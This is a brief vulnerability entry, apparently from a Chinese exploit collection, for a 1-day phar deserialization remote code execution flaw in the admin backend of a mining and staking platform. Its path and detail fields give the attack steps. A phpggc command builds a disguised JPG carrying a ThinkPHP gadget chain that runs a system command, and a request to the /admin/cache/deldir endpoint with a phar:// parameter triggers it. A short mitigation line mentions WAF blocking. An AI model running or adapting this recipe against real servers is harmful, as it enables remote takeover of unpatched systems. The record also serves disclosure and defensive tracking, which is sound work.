vendor = "CAGI"
name = "某U挖矿质押单语言系统后台phar反序列漏洞"
type = "RCE"
version = "未知"
path = "./phpggc -pj 123.jpg -o evil.jpg ThinkPHP/RCE2 system whoami /admin/cache/deldir?backup_file=phar://图片地址"
detail = "./phpggc -pj 123.jpg -o evil.jpg ThinkPHP/RCE2 system whoami /admin/cache/deldir?backup_file=phar://图片地址"
fix = "WAF封禁路路径，等待发布补丁"
date = "0829"
label = "1day"
